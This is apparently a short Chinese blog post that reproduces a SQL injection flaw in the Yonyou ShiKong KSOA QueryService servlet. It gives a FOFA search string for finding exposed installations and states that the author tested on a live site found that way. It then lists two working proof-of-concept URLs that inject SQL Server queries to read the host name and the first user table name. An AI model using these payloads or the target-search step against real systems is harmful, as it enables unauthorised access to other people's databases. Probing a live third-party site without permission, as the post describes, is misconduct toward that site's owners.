在网上看见大佬们发的用友-时空KSOA QueryService sql注入漏洞复现文章,尝试漏洞复现。
借鉴文章:用友-时空KSOA QueryService sql注入漏洞-CSDN博客
fofa语句:
app="用友-时空KSOA"
fofa上找了一个在用站点
访问接口信息
http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=
感觉应该有sql注入
发现使用的数据库是SQL Server数据库,发现忘记SQL Server数据库的语句了。
在网上查资料。
被自己菜笑了。
资料:https://blog.51cto.com/u_16213569/8134987
使用查看主机名、查询当前库第一个表名来验证sql注入是否存在
poc
http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=(select%20host_name())
查询到了对应主机名
poc
http://ip:port/servlet/com.sksoft.bill.QueryService?service=query&content=(select%20top%201%20name%20from%20sysobjects%20where%20xtype=%27U%27)
查看第一个数据库的表名,这里就不放图片了。